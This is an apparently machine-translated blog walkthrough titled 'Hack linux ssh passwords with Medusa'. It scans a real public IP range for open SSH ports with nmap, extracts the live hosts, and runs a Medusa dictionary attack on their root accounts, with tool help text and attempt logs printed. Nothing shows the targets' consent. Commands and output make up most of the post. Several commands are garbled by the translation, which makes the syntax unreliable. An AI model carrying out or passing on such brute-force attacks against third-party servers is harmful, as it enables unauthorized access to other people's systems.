Hack linux ssh passwords with Medusa

From the accidentally climax of ' blog

Egg ache, write a bit, Medusa crack up still relatively fast, first we see Help

[Email protected]:/pentest/exploits/framework3# Medusa
Medusa v1.5 [http://www.foofus.net] (C) jomo-kun/foofus Networks <[email protected]>

Alert:host information must be supplied.

Syntax:medusa [-H host|-h file] [-u username|-u file] [-P password|-p file] [-C file]-M module [OPT]
-H [TEXT]: Target hostname or IP address
-h [File]: file containing target hostnames or IP addresses
-U [TEXT]: Username to test
-u [file]: file containing usernames to test
-P [TEXT]: Password to test
-p [File]: file containing passwords to test
-c [File]: file containing combo entries. See README for more information.
-O [file]: file to append log information to
-E [n/s/ns]: Additional password checks ([n] No password, [s] Password = Username)
-M [TEXT]: Name of the module to execute (without the. mod extension)
-M [TEXT]: Parameter to pass to the module. This can is passed multiple times with a
Different parameter each time and they is all is sent to the module (i.e.
-M param1-m Param2, etc.)
-d:dump all known modules
-N [NUM]: Use for Non-default TCP port number
-s:enable SSL
-G [NUM]: Give up after trying to connect for NUM seconds (default 3)
-R [NUM]: Sleep NUM seconds between retry attempts (default 3)
-R [Num]: attempt NUM retries before giving up. The total number of attempts would be NUM + 1.
-T [NUM]: Total number of logins to be tested concurrently
-T [NUM]: Total number of the hosts to be tested concurrently
-l:parallelize logins using one username per thread. The default is to process
The entire username before proceeding.
-f:stop scanning host after first valid Username/password found.
-f:stop audit after first valid Username/password found on any host.
-b:suppress Startup Banner
-q:display module ' s usage information
-V [NUM]: Verbose level [0-6 (more)]
-W [NUM]: Error debug Level [0-10 (more)]
-v:display version
-Z [NUM]: Resume scan from host #

OK, let's see what module Medusa has to support what features the hack

[Email protected]:/pentest/exploits/framework3# medusa-d
Medusa v1.5 [http://www.foofus.net] (C) jomo-kun/foofus Networks <[email protected]>

Available modules in ".":

Available modules in "/usr/lib/medusa/modules":
+ cvs.mod:Brute Force module for CVS Sessions:version 1.0.0
+ Ftp.mod:Brute Force module for Ftp/ftps sessions:version 1.3.0
+ Http.mod:Brute Force module for Http:version 1.3.0
+ Imap.mod:Brute Force module for IMAP sessions:version 1.2.0
+ Mssql.mod:Brute Force module for M$-sql sessions:version 1.1.1
+ mysql.mod:Brute Force module for MySQL sessions:version 1.2
+ Ncp.mod:Brute Force module for NCP Sessions:version 1.0.0
+ Nntp.mod:Brute Force module for NNTP Sessions:version 1.0.0
+ Pcanywhere.mod:Brute Force module for pcanywhere sessions:version 1.0.2
+ Pop3.mod:Brute Force module for POP3 sessions:version 1.2
+ Postgres.mod:Brute Force module for PostgreSQL sessions:version 1.0.0
+ Rexec.mod:Brute Force module for rexec sessions:version 1.1.1
+ Rlogin.mod:Brute Force module for Rlogin sessions:version 1.0.2
+ Rsh.mod:Brute Force module for rsh Sessions:version 1.0.1
+ Smbnt.mod:Brute Force module for SMB (lm/ntlm/lmv2/ntlmv2) sessions:version 1.5
+ Smtp-vrfy.mod:brute Force module for enumerating accounts via SMTP vrfy:version 1.0.0
+ Smtp.mod:Brute Force module for SMTP authentication with tls:version 1.0.0
+ Snmp.mod:Brute Force module for SNMP Community strings:version 1.0.0
+ ssh.mod:Brute Force module for SSH v2 sessions:version 1.0.2
+ Svn.mod:Brute Force module for Subversion sessions:version 1.0.0
+ telnet.mod:Brute Force module for Telnet sessions:version 1.2.2
+ Vmauthd.mod:Brute Force module for the VMware authentication daemon:version 1.0.1
+ Vnc.mod:Brute Force module for VNC sessions:version 1.0.1
+ Web-form.mod:brute Force module for Web forms:version 1.0.0
+ wrapper.mod:Generic wrapper Module:version 1.0.1

Well, we're going to hack ssh, so we'll load the SSH module with the-m ssh parameter, not with the. MoD

First we set the target, scan the open SSH machine, take a scan for a bit.

[Email protected]:/pentest# nmap-sv-p22-og ssh 69.163.190.0/24

Then is the long wait, the above parameter scanning means, scanning the entire segment opened the 22-port machine, and judge the service version, saved to the SSH file.

Then we look at the scan results

[Email protected]:/pentest# cat SSH
# Nmap 5.00 Scan initiated Tue June 02:18:28 as:nmap-sv-p22-og ssh 69.163.190.0/24

host:69.163.190.1 (ip-69-163-190-1.dreamhost.com) ports:22/closed/tcp//ssh///
host:69.163.190.2 (ip-69-163-190-2.dreamhost.com) ports:22/closed/tcp//ssh///
host:69.163.190.3 (ip-69-163-190-3.dreamhost.com) ports:22/closed/tcp//ssh///
host:69.163.190.4 (dragich.shaggy.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.5 (myrck.spongebob.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.6 (apache2-twang.luthor.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.7 (ps11591.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.8 (ps10854.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.9 (rangerjill.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.10 (ouellette.yogi.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.11 (psmysql11957.dreamhostps.com) ports:22/open/tcp//ssh//openssh 4.3p2 Debian 9etch2 (Protocol 2.0)/
host:69.163.190.12 (rubeo.yogi.dreamhost.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
host:69.163.190.13 (alt-malware.com) ports:22/open/tcp//ssh//openssh 5.1P1 Debian 5 (Protocol 2.0)/
Like this, here we have to tidy up, the SSH IP opened up, now understand the meaning of OG preservation

[Email protected]:/pentest#grep 22/open ssh | cut-d ""-F 2 >>ssh1.txt

The cut is used in this command, and the detailed usage is not wordy. View Results

[Email protected]:/pentest# cat Ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
And then we start to find a dictionary and start hacking the SSH password.

[Email protected]:/pentest# medusa-h ssh1.txt-u root-p p.txt-m ssh

[Email protected]:/pentest# medusa-h ssh1.txt-u root-p p.txt-m ssh
Medusa v1.5 [http://www.foofus.net] (C) jomo-kun/foofus Networks <[email protected]>

Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) password:root (1 of 7 Comp lete)
Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) password:admin (2 of 7 com Plete)
Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) password:oracle (3 of 7 Co Mplete)
Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) Password:tomcat (4 of 7 Co Mplete)
Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) password:postgres (5 of 7 Complete
Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) password:webmin (6 of 7 Co Mplete)
Account CHECK: [SSH] host:69.163.190.4 (1 of 235, 1 complete) user:root (1 of 1, 1 complete) password:fuckyou (7 of 7 C Omplete)
Account CHECK: [SSH] host:69.163.190.5 (2 of 235, 2 complete) user:root (1 of 1, 1 complete) password:root (1 of 7 Comp lete)
Account CHECK: [SSH] host:69.163.190.5 (2 of 235, 2 complete) user:root (1 of 1, 1 complete) password:admin (2 of 7 com Plete)
Account CHECK: [SSH] host:69.163.190.5 (2 of 235, 2 complete) user:root (1 of 1, 1 complete) password:oracle (3 of 7 Co Mplete)
Account CHECK: [SSH] host:69.163.190.5 (2 of 235, 2 complete) user:root (1 of 1, 1 complete) Password:tomcat (4 of 7 Co Mplete)
OK, wait, this time you can do that, or find a piece of that what, the results will be automatically displayed.

Hack linux ssh passwords with Medusa